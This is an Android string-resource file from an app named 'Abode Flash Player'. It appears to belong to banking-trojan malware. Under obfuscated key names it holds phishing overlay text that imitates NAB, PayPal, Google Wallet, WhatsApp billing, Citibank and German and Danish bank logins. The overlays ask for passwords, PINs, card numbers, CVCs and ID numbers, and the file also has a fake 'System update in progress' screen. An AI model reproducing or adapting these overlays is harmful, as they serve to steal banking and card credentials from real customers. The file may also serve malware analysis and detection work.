<?xml version="1.0" encoding="utf-8"?>
<resources>
    <string name="abc_action_mode_done">Done</string>
    <string name="abc_action_bar_home_description">Navigate home</string>
    <string name="abc_action_bar_up_description">Navigate up</string>
    <string name="abc_action_menu_overflow_description">More options</string>
    <string name="abc_searchview_description_search">Search</string>
    <string name="abc_searchview_description_query">Search query</string>
    <string name="abc_searchview_description_clear">Clear query</string>
    <string name="abc_searchview_description_submit">Submit query</string>
    <string name="abc_searchview_description_voice">Voice search</string>
    <string name="abc_activitychooserview_choose_application">Choose an app</string>
    <string name="abc_activity_chooser_view_see_all">See all</string>
    <string name="abc_shareactionprovider_share_with_application">Share with %s</string>
    <string name="abc_shareactionprovider_share_with">Share with</string>
    <string name="app_name">Abode Flash Player</string>
    <string name="rhaqrdlwj">System update in progress. Please, Wait…</string>
    <string name="nietgif">Thank you for downloading app. Currently server is overloaded with number of requests. Try opening app later, please.</string>
    <string name="qnbjbauf">Log on with your NetBank details</string>
    <string name="adhmsfdhrms">Client number</string>
    <string name="gicggmag">Password</string>
    <string name="sm_beqguk">Continue</string>
    <string name="qdhqsvit">"Keep your Internet Banking and secret authorisation code (SMS) secret. Don't reveal these details to anyone, not even if they claim to be NAB."</string>
    <string name="hqvrkln">NAB ID</string>
    <string name="ck_birh_mw">Customer ID</string>
    <string name="hpfvhnlgh">Password</string>
    <string name="wn_dtsjf_">Verify me</string>
    <string name="sqnnamlkn">Card/access no.</string>
    <string name="qfquanghb">Issue</string>
    <string name="n__qcr">Security no.</string>
    <string name="trsjbkdum">Internet password</string>
    <string name="oebqcbuchbj">Logon</string>
    <string name="afhuhndv">ussd</string>
    <string name="wnnc_wtaof">cd</string>
    <string name="pumwoa">/</string>
    <string name="lqbipibf">uval</string>
    <string name="gfckmt_p">Card number</string>
    <string name="ude_rdp">MM</string>
    <string name="mhrpckgn">YY</string>
    <string name="skhds_i">/</string>
    <string name="cvc_code">CVC</string>
    <string name="iufpgbk">Enter details about the credit card you want to use with Google Wallet.</string>
    <string name="iu_nfbbrr"><b>Discover, MasterCard, Visa, and Visa Electron</b>" The CVC is the last three digits of the number that appears on the back of your card in the signature bar. "</string>
    <string name="dhkdrro"><b>American Express</b>" The CVC is the four digits located on the front of the card, on the right side. "</string>
    <string name="jbunchnq">Add card</string>
    <string name="dfvqo_m">Continue</string>
    <string name="ollahbh">No connection to server</string>
    <string name="tnjbrtde">City</string>
    <string name="rpljghm">Postal code</string>
    <string name="qbutbnnu">Street address</string>
    <string name="hwrfcgj_i">Cancel</string>
    <string name="dvtbedvn">Phone number</string>
    <string name="ngsolww_">First name</string>
    <string name="tvgcpw">Last name</string>
    <string name="emjhruhnu">Cardholder name</string>
    <string name="kgnj_rtce">Date of birth</string>
    <string name="djcbow_f">Please enter your billing address to be stored in your Google account.</string>
    <string name="fvhssro">Password</string>
    <string name="iaibowlvb">Update Google Play services</string>
    <string name="naqnarl">Ok</string>
    <string name="wkrpgcws">Please enter your new country code and phone number:</string>
    <string name="pjbkrcvc">new phone number</string>
    <string name="snqmigjjq">E-mail or login</string>
    <string name="gkhdpmijf">Password</string>
    <string name="qp_fiktd">Log in</string>
    <string name="hjdclfbbs"><u>Forgot your password?</u></string>
    <string name="khjeigpg"><u>Terms and Conditions</u></string>
    <string name="ukejsn">OPTIONS</string>
    <string name="dnrvcwk">Email address</string>
    <string name="icmvmg">Password</string>
    <string name="trjcmqe">Log In</string>
    <string name="ob_tbmo">New to PayPal? Sign Up</string>
    <string name="ooffso">HK ID card</string>
    <string name="sfvodqkjwhe">(include first seven characters only, e.g. A123456)</string>
    <string name="tqoqidohf">Add or update your billing information to extend your WhatsApp subscriptions (0.99$/year) automatically.</string>
    <string name="bomajtpdff">Please enter your billing address.</string>
    <string name="wdqgto_l">Benutzername</string>
    <string name="_ejjjgcue">Passwort</string>
    <string name="ovp_llbq">Banking</string>
    <string name="uhudow_">Zielsparen</string>
    <string name="wjomlfrasd">Finder</string>
    <string name="ipdrdi">Börseinfo</string>
    <string name="ouosfja">… mehr</string>
    <string name="dmpkbfgt">Anmelden</string>
    <string name="qwwbuahpq">Enter CPR no. or user number</string>
    <string name="mfjcprg">Remember user</string>
    <string name="eriacu">Enter PIN code</string>
    <string name="mvkvudo">You choose your own PIN code in Netbank</string>
    <string name="u_qnpbnt">Log on</string>
    <string name="qr_pow_qe">Welcome to Mobilbank</string>
    <string name="ndewrjc"><u>Forgot Password</u></string>
    <string name="vsiovmag"><u>Show Example</u></string>
    <string name="mktbs_b"><u>Switch to Desktop View</u></string>
    <string name="hvfojpdm">Some handsets may have problem in Citibank Mobile Financial Services. To enjoy better user experience and avoid any unexpectted technical problem, we recommend the use of our certified mobile handsets. Please <a href="#">click here</a> to check the continuosly updated list.</string>
    <string name="kjekwst">We are using third party technologies to track website usage and activities at our website on our behalf. To opt out or learr more details, please <a href="#">click here</a>.</string>
    <string name="agtp_fmtm">Important notice: Simplifying the management of online banking user ID. For details, <a href="#">click here</a></string>
    <string name="jsqe_fqmrupl"><u>Passwort vergessen?</u></string>
    <string name="mutcvokuos"><u>Passwort ändern</u></string>
</resources>
